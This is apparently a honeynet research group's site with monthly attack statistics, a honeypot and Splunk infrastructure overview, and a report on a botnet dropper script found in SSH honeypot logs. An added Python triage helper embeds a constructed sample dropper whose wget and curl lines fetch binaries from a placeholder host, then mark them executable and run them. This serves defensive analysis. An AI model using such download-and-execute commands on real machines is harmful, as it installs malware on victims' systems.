Welcome

Welcome to the Dutch Honeynet Chapter. This project has many components, and its goal is the mass collection of data.

We will be monitoring many different services across client honeypots, server honeypots and SCADA honeypots.

We will also be focusing on a select group of websites and monitoring them for malicious changes. Another component of our work will perform automated malware analysis using custom modifications to the Cuckoo malware analysis engine.

We are looking for others to share data with.


Monthly stats: October 2015

Stats

  • Total attacks: 5149873
  • Total unique attackers: 149031
  • Total unique MD5s: 662
  • Total unique URLs: 2985

Countries

Country         Attacks   Percentage
Bulgaria         669010    13.391580
Venezuela        588031    11.770623
China            508521    10.179070
Russia           476921     9.546533
Brazil           377183     7.550076
United States    279216     5.589070
Japan            233278     4.669528
Egypt            188663     3.776469
Hong Kong        182791     3.658929
Ukraine          145716     2.916799


Monthly stats: August 2015

Stats

  • Total attacks: 3303872
  • Total unique attackers: 147233
  • Total unique MD5s: 457
  • Total unique URLs: 1749

Countries

Country         Attacks   Percentage
China            473535    15.245589
United States    344286    11.084382
Egypt            304413     9.800660
Venezuela        303171     9.760673
Japan            278638     8.970827
Vietnam          139704     4.497808
Russia           134387     4.326626
Turkey           123942     3.990347
Brazil           120939     3.893664
Hong Kong         85259     2.744937


Monthly stats: July 2015

July has been an exciting month for us. We have been steadily expanding our worldwide honeypot sensor coverage to a total of 57 sensors in the following countries: NL, US, UK, DE, RO, JP, UA, SA, AU, SG, HK, BR.

But the majority of our effort has gone into building out our analytic capabilities for mining threat intelligence from this data worldwide.

We have chosen Splunk to assist us in this endeavour, and we would like to share some of our metrics with you.


DDoS botnet defaced

While collecting last month's stats we made a nice discovery in the SSH logs from Kippo.

[Image: kippo_file_found]

(The file in question is gb.sh.)

It first came up on our Splunk dashboard, and when we checked the link it was still online. Curious to find out more about the file, we started to dig into it.

We learned that the shell script actually downloads another 6 files, which are pre-compiled; it then marks them executable and finally starts them.
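As an added example (not code from the chapter, and not the contents of gb.sh), a small Python triage helper that reads a dropper shell script and reports the download, chmod and execute chain described above. The sample script, its hostnames and file names are constructed placeholders, and it fetches three files rather than six to keep it short.

```python
import re
from dataclasses import dataclass, field

# Constructed sample dropper, modeled on the behaviour described above
# (fetch pre-compiled binaries, mark them executable, run them).
# Hostname and file names are placeholders, not the real gb.sh contents.
SAMPLE_DROPPER = """#!/bin/sh
cd /tmp
wget http://dropper.example.invalid/bins/a1 -O a1
wget http://dropper.example.invalid/bins/a2 -O a2
curl -s http://dropper.example.invalid/bins/a3 -o a3
chmod +x a1 a2
chmod 755 a3
./a1 &
./a2 &
./a3
"""

@dataclass
class DropperReport:
    downloads: list = field(default_factory=list)        # URLs fetched
    made_executable: list = field(default_factory=list)  # files chmod'ed
    executed: list = field(default_factory=list)         # files run

    def is_dropper_chain(self) -> bool:
        # A file that is marked executable and then run is the
        # download-and-execute pattern this post describes.
        return bool(set(self.made_executable) & set(self.executed))

URL_RE = re.compile(r"https?://\S+")

def triage_dropper(script: str) -> DropperReport:
    report = DropperReport()
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        cmd = parts[0]
        if cmd in ("wget", "curl"):
            report.downloads += URL_RE.findall(line)
        elif cmd == "chmod":
            # skip the mode argument (+x, 755, ...); the rest are file names
            report.made_executable += parts[2:]
        elif cmd.startswith("./"):
            report.executed.append(cmd[2:])
    return report
```

Run `triage_dropper(SAMPLE_DROPPER)` to get the three lists; `is_dropper_chain()` is true when a file is both made executable and started.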


Honeypot Infrastructure

One of the goals of the Dutch Honeypots Project is to collect data. Since our inception, we have been working on the design of our data collection infrastructure. As a start we have chosen to run some basic honeypot services (Kippo, Dionaea and p0f). We start with basic services so that we can first get our logging backend right.
To collect logs centrally we chose Splunk, since it has many advanced features and allows us to (possibly) integrate live data into this website. Furthermore, any type of log (e.g. text files, log files, databases) can be imported into Splunk by running the Splunk Universal Forwarder on the honeypot. The forwarder sends the data to the Splunk Indexer, which parses the logs. We also store the logs on the Indexer and keep an archive.

The following diagram shows a global overview of our current infrastructure:

[Image: Infrastructure Overview]

This is the infrastructure now in place. Splunk still needs to be configured for the most part, so that we can generate useful overviews and crunch through all the data.

Our next step is to expand the number of honeypot services. These services will be in line with the goals set out on the Project page. Once we have more services we will also expand the number of honeypots, so that we can collect more data.